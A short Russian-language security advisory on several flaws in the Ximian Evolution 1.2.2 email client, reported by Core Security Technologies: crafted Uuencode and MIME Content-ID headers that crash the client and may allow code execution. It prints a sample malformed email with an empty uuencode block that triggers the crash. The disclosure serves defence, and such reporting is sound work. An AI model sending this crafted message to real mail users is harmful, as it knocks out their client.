Несколько уязвимостей обнаружено в Ximian Evolution e-mail client software. Удаленный пользователь может вызвать отказ в обслуживании, обойти проверки безопасности и может выполнять произвольные команды на целевой системе. 

Core Security Technologies сообщил, что удаленный пользователь может послать специально обработанный Uuencode заголовок в электронном сообщении, чтобы аварийно завершить работу клиента при попытке прочитать это сообщение. 

Также сообщается, что удаленный пользователь может послать особенно обработанный MIME Content-ID заголовок как часть MIME образа, чтобы передать произвольные данные к GTKHtml для обработки. В результате работа приложения аварийно завершиться с возможностью выполнения произвольного кода. 

Пример: 

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary=»=-mTDu5zdJIsixETTwCF5Y»
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

—=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600

end

Уязвимость обнаружена в Ximian Evolution Mail User Agent 1.2.2
.



Оставить мнение